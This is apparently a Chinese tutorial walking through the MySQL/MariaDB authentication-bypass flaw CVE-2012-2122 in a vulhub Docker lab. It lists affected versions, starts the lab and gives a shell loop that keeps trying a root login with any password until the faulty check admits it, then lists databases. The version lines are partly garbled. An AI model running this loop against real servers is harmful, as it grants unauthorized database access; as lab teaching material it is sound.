本文主要是介绍MySQL 身份认证漏洞 CVE-2012-2122,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
漏洞影响版本
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
演示
开启靶场
进入漏洞目录
cd /root/vulhub/mysql/CVE-2012-2122
开启漏洞靶场
docker-compose up -d
攻击
直接 运行 这个命令
for i in `seq 1 100`;do mysql -uroot -p11111 -h 192.168.61.128 -P3306;donefor i in `seq 1 1000`;do mysql -u(账号不用正确) -p(密码不用正确) -h(MySQLIP地址) -P3306;done
这个命令的意思就是:for语句调用终端去连接MySQL,如果存在这个漏洞,他就会不断的去尝试进入 MySQL 数据库中
显示数据库
show databases;
显示数据库版本
select version();
这篇关于MySQL 身份认证漏洞 CVE-2012-2122的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
